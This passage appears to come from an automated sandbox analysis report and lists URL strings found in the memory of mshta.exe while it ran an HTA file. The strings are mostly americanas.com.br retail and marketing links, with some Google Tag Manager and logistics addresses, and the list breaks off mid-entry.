Source: mshta.exe, 00000000.00000002.2776588517.000000000C110000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2749644563.000000000AA58000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2775247282.000000000AA60000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668295079.000000000C110000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655457107.000000000AA4F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665620808.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654534140.000000000C0F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2750256226.000000000AA5D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743221482.000000000AA57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/vale
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664940461.00000000093B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669695737.00000000093B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770661764.00000000092B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656004921.00000000093B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/vale-presente?chave=brd_hm_mn_0_bottom_valepresente17
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/lay
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2752639169.00000000092DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743361404.00000000092D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770941763.00000000092DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657340693.00000000092CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667279344.00000000092D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2714211819.0000000009A89000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666265596.00000000092CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2705339343.0000000009A87000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/lojas-proximas?chave=brd_hm_tt_0_0_recebahoje
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/lojas-proximas?delivery=pick-up-store&amp;chave=dk_hm_ats_2_2_entrega
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A95D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656547873.0000000003410000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769737013.0000000006EF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2766288586.0000000003410000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744420175.0000000003410000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727259266.0000000006EF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/lojas-proximas?delivery=pick-up-store&chave=dk_hm_ats_2_2_entrega
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/lojista/americanas-33014556000196/c/brinquedos?origem=blancalojista&am
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.00000000093CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668679539.00000000093CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664288455.00000000093CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726694217.00000000093CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656004921.00000000093CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/lojista/americanas-33014556000196/c/brinquedos?origem=blancalojista&ch
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2777017710.000000000C288000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2678429529.000000000DF69000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2534072196.0000000006591000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2725727617.000000000DF6D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2647607902.000000000C288000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2678538607.000000000DF6B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655631658.000000000C288000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666159543.000000000C0A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654506502.000000000AA0A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2678593074.000000000DF6C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/marca/chandon
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A95D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533852956.000000000DD39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/produto/1343943570?chave=dk_hm_bn_4_7_oferta-o2o
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A95D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533852956.000000000DD39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/produto/5008766730?chave=dk_hm_bn_4_2_oferta-esporte
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A95D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533852956.000000000DD39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/produto/5271512690?chave=dk_hm_bn_4_4_oferta-portateis
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A95D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533852956.000000000DD39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/produto/60405799?chave=dk_hm_bn_4_1_oferta-perfume
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A95D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533852956.000000000DD39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/produto/7211551574?chave=dk_hm_bn_4_3_oferta-moda
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A95D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/produto/7503637854?chave=dk_hm_bn_4_8_oferta-o2o
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A95D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533852956.000000000DD39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/produto/7510984306?chave=dk_hm_bn_4_6_oferta-arvore
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A95D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533852956.000000000DD39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/produto/7510984342?chave=dk_hm_bn_4_5_oferta-led
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanasadvertising.com?utm_source=site_marcas_americanas&amp;utm_medium=botao_footer&
Source: mshta.exe, 00000000.00000003.2677244929.00000000092EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743843394.00000000092F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751994792.00000000092F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A9A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771261740.00000000092F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667308692.000000000C101000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanasadvertising.com?utm_source=site_marcas_americanas&utm_medium=botao_footer&utm_
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanasmarketplace.com.br/?epar=bo_tx_st_am_gw_footer_americanas&amp;utm_source=ameri
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654357820.000000000C367000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668295079.000000000C107000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2647607902.000000000C351000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666932319.000000000C368000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667502431.000000000C106000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2777400631.000000000C369000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769737013.0000000006EF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667308692.000000000C103000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654534140.000000000C0F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanasmarketplace.com.br/?epar=bo_tx_st_am_gw_footer_americanas&utm_source=americana
Source: mshta.exe, 00000000.00000003.2727024029.000000000C0EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676098598.000000000C0EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2776512288.000000000C0ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654357820.000000000C367000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675688068.000000000C36E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2647607902.000000000C351000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666932319.000000000C368000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769737013.0000000006EF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665620808.000000000C10A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.directlog.com.br/
Source: mshta.exe, 00000000.00000003.2749376863.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2659343990.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2659343990.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744061643.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2766066780.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2749376863.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2745043189.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764898433.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2658616055.0000000003371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656547873.000000000336A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2766109182.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
Source: mshta.exe, 00000000.00000002.2766191260.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657107749.00000000033FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657107749.00000000033CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2729852380.00000000065A5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657750155.00000000033B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656547873.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2766365966.000000000341E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656547873.00000000033B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2766191260.00000000033FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656547873.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656547873.0000000003410000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2766148440.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654867106.00000000065A3000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744061643.00000000033B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2750540197.00000000033FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660837528.000000000341D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2750540197.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2749376863.00000000033B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2765906435.00000000033B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PDFX6WC
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654357820.000000000C367000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675688068.000000000C36E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2647607902.000000000C351000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666932319.000000000C368000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770024098.0000000009210000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665620808.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 